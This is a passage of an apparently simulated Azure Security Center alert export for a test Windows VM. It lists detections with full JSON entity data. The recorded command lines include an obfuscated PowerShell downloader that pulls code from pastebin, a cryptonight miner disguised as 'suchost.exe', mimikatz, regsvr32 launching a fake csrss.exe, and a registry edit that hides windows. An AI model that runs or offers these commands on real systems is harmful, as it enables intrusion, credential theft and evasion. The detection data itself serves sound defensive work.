""Suspicious Command Line"": ""asc_alerttest_662jfi039n.exe -foo"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x570"",
""Arguments Auditing Enabled"": ""true"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""asc_alerttest_662jfi039n.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x570"",
""CommandLine"": ""asc_alerttest_662jfi039n.exe -foo"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:05.4079619Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:05.4079619Z"",
""EndTimeUtc"": ""2019-01-15T11:45:05.4079619Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
150,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:06,2019-01-15 11:45:06,91a4f9a7-70ad-433b-a568-34314e3f467f,2518547480938543829_91a4f9a7-70ad-433b-a568-34314e3f467f,Detection,Microsoft,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Analysis of host data on MSTICALERTSWIN1 detected indicators associated with Petya ransomware. See https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ for more information. Review the commandline associated in this alert and escalate this alert to your security team.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo rundll32.exe perfc.dat"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x16f4"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Petya\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Petya.pdf?sv=2018-03-28&sr=b&sig=bmxpe8CeqqzreQFf4BQaU6v9CPzAiouO%2F8xIaJUIHeU%3D&spr=https&st=2019-01-14T20:16:14Z&se=2019-04-14T20:31:14Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x16f4"",
""CommandLine"": ""cmd /c echo rundll32.exe perfc.dat"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:06.145617Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:06.145617Z"",
""EndTimeUtc"": ""2019-01-15T11:45:06.145617Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
151,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,adfabbe0-fce0-44f3-be4b-17283bd03bed,2518547480982511513_adfabbe0-fce0-44f3-be4b-17283bd03bed,Detection,Microsoft,Detected obfuscated command line.,Detected obfuscated command line.,Detected obfuscated command line.,Attackers use increasingly complex obfuscation techniques to evade detections that run against the underlying data. Analysis of host data on MSTICALERTSWIN1 detected suspicious indicators of obfuscation on the commandline.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xbc8"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xbc8"",
""CommandLine"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.7488486Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.7488486Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.7488486Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
152,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:10,2019-01-15 13:15:10,171b74b2-a431-4b55-8d69-128e5fb95329,2518547426892072407_171b74b2-a431-4b55-8d69-128e5fb95329,Detection,Microsoft,Suspiciously named process detected,Suspiciously named process detected,Suspiciously named process detected,Analysis of host data on MSTICALERTSWIN1 detected a process whose name is very similar to but different from a very commonly run process (svchost). While this process could be benign attackers are known to sometimes hide in plain sight by naming their malicious tools to resemble legitimate process names.,High,False,"{
""Account Session Id"": ""0x1794e44"",
""Compromised Host"": ""MSTICALERTSWIN1"",
""Parent Process"": ""cmd.exe"",
""Process Id"": ""0x1600"",
""Similar To Process Name"": ""svchost"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Process Name"": ""suchost.exe"",
""User Name"": ""MSTICAlertsWin1\\MSTICAdmin"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""2"",
""HostName"": ""msticalertswin1"",
""AzureID"": ""/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1"",
""OMSAgentID"": ""46fe7078-61bb-4bed-9430-7ac01d91c273"",
""Type"": ""host""
},
{
""$id"": ""3"",
""Name"": ""msticadmin"",
""NTDomain"": ""msticalertswin1"",
""Host"": {
""$ref"": ""2""
},
""IsDomainJoined"": false,
""Type"": ""account""
},
{
""$id"": ""4"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:10.7927592Z"",
""EndTimeUtc"": ""2019-01-15T13:15:10.7927592Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""2""
},
""Account"": {
""$ref"": ""3""
}
},
{
""$id"": ""5"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ImageFile"": {
""$ref"": ""5""
},
""Account"": {
""$ref"": ""3""
},
""Host"": {
""$ref"": ""2""
},
""Type"": ""process""
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
153,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:14,2019-01-15 13:15:14,89d1850f-dccd-4d45-b194-650819d358d9,2518547426859453218_89d1850f-dccd-4d45-b194-650819d358d9,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,"Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\mimikatz.exe' was running on the machine, often associated with attacker attempts to access credentials.'",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\mimikatz.exe"",
""Suspicious Command Line"": "".\\mimikatz.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1bd0"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1bd0"",
""CommandLine"": "".\\mimikatz.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:14.0546781Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:14.0546781Z"",
""EndTimeUtc"": ""2019-01-15T13:15:14.0546781Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:16,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
154,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:14,2019-01-15 13:15:14,51b74398-40e2-4b1b-9d92-89c0004738c9,2518547426858055460_51b74398-40e2-4b1b-9d92-89c0004738c9,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1220"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1220"",
""CommandLine"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:14.1944539Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:14.1944539Z"",
""EndTimeUtc"": ""2019-01-15T13:15:14.1944539Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:16,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
155,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:13,2019-01-15 13:15:13,75495c57-4fd6-4e27-b94c-c6f81f78bcb5,2518547426863814510_75495c57-4fd6-4e27-b94c-c6f81f78bcb5,Detection,Microsoft,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,"Analysis of host data on MSTICALERTSWIN1 detected an attempted WindowPosition registry configuration change that could be indicative of hiding application windows in non-visible sections of the desktop. This could be legitimate activity, or an indication of a compromised machine: this type of activity has been previously associated with known adware (or unwanted software) such as Win32/OneSystemCare and Win32/SystemHealer and malware such as Win32/Creprote. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00, corresponding to X-axis=0c00 and the Y-axis=0c00) this places the console app's window in a non-visible section of the user's screen in an area that is hidden from view below the visible start menu/taskbar. Known suspect Hex value includes, but not limited to c000c000",Low,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1b28"",
""Hex Value set for WindowPosition"": ""200007c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1b28"",
""CommandLine"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:13.6185489Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""Hive"": ""HKEY_CURRENT_USER"",
""Key"": ""console"",
""Type"": ""registry-key""
},
{
""$id"": ""11"",
""Key"": {
""$ref"": ""10""
},
""ValueType"": ""Unknown"",
""Type"": ""registry-value""
},
{
""$id"": ""12"",
""Key"": {
""$ref"": ""10""
},
""Name"": ""windowposition"",
""Value"": ""System.Byte[]"",
""ValueType"": ""DWord"",
""Type"": ""registry-value""
},
{
""$id"": ""13"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:13.6185489Z"",
""EndTimeUtc"": ""2019-01-15T13:15:13.6185489Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:16,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
156,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:13,2019-01-15 13:15:13,184c075e-64ee-4901-bc37-6eb999e81a11,2518547426862437699_184c075e-64ee-4901-bc37-6eb999e81a11,Detection,Microsoft,Suspicious system process executed,Suspicious system process executed,Suspicious system process executed,The system process c:\windows\fonts\csrss.exe was observed running in an abnormal context. Malware often use this process name to masquerade its malicious activity.,Medium,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\fonts\\csrss.exe"",
""command line"": ""c:\\windows\\fonts\\csrss.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1b5c"",
""account logon id"": ""0x1794e44"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xe04"",
""System Process"": ""CSRSS.EXE"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1b5c"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:13.75623Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:13.75623Z"",
""EndTimeUtc"": ""2019-01-15T13:15:13.75623Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:16,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
157,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:16,2019-01-15 13:15:16,7b30c978-28d5-4a28-a4c2-0985f08ab1c6,2518547426833838523_7b30c978-28d5-4a28-a4c2-0985f08ab1c6,Detection,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,"Analysis of host data indicates an execution of a process with a suspicious double extension.
This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x188c"",
""account logon id"": ""0x1794e44"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xe04"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious Double Extensions\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2018-03-28&sr=b&sig=hfaFk1Af%2FV1JdophFihpY1PS%2BcpjxIbptNyVi%2Fm4S4s%3D&spr=https&st=2019-01-15T11:52:55Z&se=2019-04-15T12:07:55Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=bdb7e59d-8ba8-4351-aa6d-eedc6b916aa5\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""doubleextension.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x188c"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:16.6161476Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
